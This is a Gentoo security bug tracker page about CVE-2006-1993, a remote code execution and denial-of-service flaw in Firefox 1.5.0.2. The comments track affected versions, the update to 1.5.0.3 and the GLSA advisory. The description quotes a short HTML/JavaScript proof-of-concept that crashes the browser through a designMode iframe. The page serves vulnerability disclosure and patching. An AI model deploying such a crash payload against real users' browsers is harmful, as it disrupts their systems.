Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 131138 - www-client/mozilla-firefox[-bin]: 1.5.0.2 Remote Code Execution and DoS vulnerability (CVE-2006-1993)
Summary: www-client/mozilla-firefox[-bin]: 1.5.0.2 Remote Code Execution and DoS vulne...
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High major (vote)
Assignee: Gentoo Security
URL: http://www.securident.com/vuln/ff.txt
Whiteboard: A2 [glsa]
Keywords:
Depends on: 132080
Blocks:
  Show dependency tree
 
Reported: 2006-04-24 13:11 UTC by Raphael Marichez (Falco) (RETIRED)
Modified: 2006-05-06 10:19 UTC (History)
3 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-04-24 13:11:03 UTC
http://archives.neohapsis.com/archives/bugtraq/2006-04/0502.html

** firefox 1.5.0.2 is already marked stable for ppc and amd64. **


------------------------------------------------------------

http://www.securident.com/vuln/ffdos.htm - PoC firefox dos
 

 Paste the below code snippet and view it in Firefox for DoS PoC or visit the link above.

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea> 
  <script> 
       var textarea = document.getElementsByName("x_OtherInfo"); 
       textarea=textarea.item(0); 
           var htmlarea = document.createElement("div"); 
       htmlarea.className = "htmlarea";  
       textarea.parentNode.insertBefore(htmlarea, textarea); 
       var iframe = document.createElement("iframe"); 
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document; 
                 doc.designMode = "on"; 
                 doc.open(); 
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus() 
  doc.close(); 
  </script>
</textarea>
Comment 1 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-04-24 13:13:28 UTC
firefox 1.0.8 is NOT affected
Comment 2 Jory A. Pratt 2006-04-24 17:13:57 UTC
in order for this to be of importance a user must have javascript enabled, enabling javascript globally is a mistake in itself. Bug does nothing but serve as reference for those who might experience the javascript bug.
Comment 3 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-04-24 21:37:04 UTC
AFAIR it is enabled by default in 1.5.
Comment 4 Carsten Lohrke (RETIRED) gentoo-dev 2006-04-25 10:19:56 UTC
(In reply to comment #2)
> in order for this to be of importance a user must have javascript enabled,
> enabling javascript globally is a mistake in itself. Bug does nothing but serve
> as reference for those who might experience the javascript bug.

Personally I wouldn't even disagree, but I know there are enough who would, since there are too much broken websites not working (properly) without Javascript. Not too long ago even our bugzilla help page was not reachable without it. And expecting Joe user to take care about a problem, he usually is not even aware about, is not realistic anyways.

Comment 5 Lars Wendler (Polynomial-C) (RETIRED) gentoo-dev 2006-04-25 12:48:06 UTC
seamonkey seems to be affected, too...
Comment 6 Thierry Carrez (RETIRED) gentoo-dev 2006-04-28 11:15:16 UTC
Can't find an upstream bug for this.
Setting to A because we can assume almost everyone keeps JavaScript enabled.
Comment 7 Sascha G. 2006-04-30 07:59:44 UTC
(In reply to comment #4)
> Personally I wouldn't even disagree, but I know there are enough who would,
> since there are too much broken websites not working (properly) without
> Javascript.

Being a big fan of the NoScript extension, I agree.
Like bugs.gentoo.org, for example (quicksearch).

(In reply to comment #6)
> Can't find an upstream bug for this.
> Setting to A because we can assume almost everyone keeps JavaScript enabled.

https://bugzilla.mozilla.org/show_bug.cgi?id=334515
Comment 8 Jory A. Pratt 2006-05-02 16:10:30 UTC
1.5.0.3 is in the tree mark it stable, amd64 do not forget -bin.
Comment 9 Jory A. Pratt 2006-05-02 19:29:10 UTC
ff-1.5.0.3 source stable, leaving amd64 alias until -bin is stablized.
Comment 10 Thomas Cort (RETIRED) gentoo-dev 2006-05-02 20:18:26 UTC
mozilla-firefox-bin-1.5.0.3 stable on amd64.
Comment 11 Lars Weiler (RETIRED) gentoo-dev 2006-05-03 07:15:43 UTC
www-client/mozilla-firefox-1.5.0.3 stable on ppc.  No -bin-pkg available.
Comment 12 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-05-05 11:10:17 UTC
Drafting...

bug 132080 might be not new. What's the policy in this case ? We're waiting before sending GLSA or not ?
Comment 13 Thierry Carrez (RETIRED) gentoo-dev 2006-05-06 10:19:59 UTC
Yes, that's probably an old bug.
GLSA 200605-06 done.